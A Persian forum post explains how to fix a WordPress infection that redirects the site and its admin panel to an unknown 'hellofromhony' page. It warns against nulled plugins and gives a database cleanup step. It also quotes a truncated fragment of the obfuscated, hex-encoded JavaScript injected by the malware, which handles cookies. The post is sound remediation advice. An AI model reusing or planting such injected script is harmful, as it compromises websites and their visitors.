حل مشکل ویروس ریدارکت سایت و ادمین به صفحه ی ناشناس

(آرش کیان) #1

اخیرا مشاهده شده که بعضی سایت ها دچار مشکلی هستند که صفحه مدیریت آنها به صفحه ای به آدرس hellofromhony ریدارکت می شود و یه سری کد های نا مفهوم در آن نمایش داده می شود.

ابتدا باید عرض کنم همیشه گفتیم باز هم تکرار می کنم موقع خرید دقت کنید یا از افزونه های نال استفاده نکنید تا مشکلات عدیده گریبانگیر شما عزیزان نشود.

خب بریم سراغ رفع این مشکل:
وارد CPanel شوید سپس از بخش phpmyadmin دیتابیس وردپرستان را انتخاب کنید و تیبل wp_options را انتخاب کنید (wp_ پرفیکس دیتابیس می باشد که ممکن است در سیستم های مختلف متفاوت باشد که در wp-config.php می توانید ببینید) و دو آدرس اول را با آدرس سایت خودتان تغییر بدید و دیتابیس را ذخیره کنید.

بخشی از خطای دریافت شده

var _0xcdaa=["","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66","\x3D\x3B\x20\x4D\x61\x78\x2D\x41\x67\x65\x3D\x2D\x39\x39\x39\x39\x39\x39\x39\x39\x3B"];function gjhwe4234(_0x7f0ex2,_0x7f0ex3,_0x7f0ex4){var _0x7f0ex5=_0xcdaa[0];if(_0x7f0ex4){var _0x7f0ex6= new Date();_0x7f0ex6[_0xcdaa[2]](_0x7f0ex6[_0xcdaa[1]]()+ (_0x7f0ex4* 8* 60* 60* 1000));_0x7f0ex5= _0xcdaa[3]+ _0x7f0ex6[_0xcdaa[4]]()};document[_0xcdaa[5]]= _0x7f0ex2+ _0xcdaa[6]+ (_0x7f0ex3|| 

موفق و پیروز باشید

7 Likes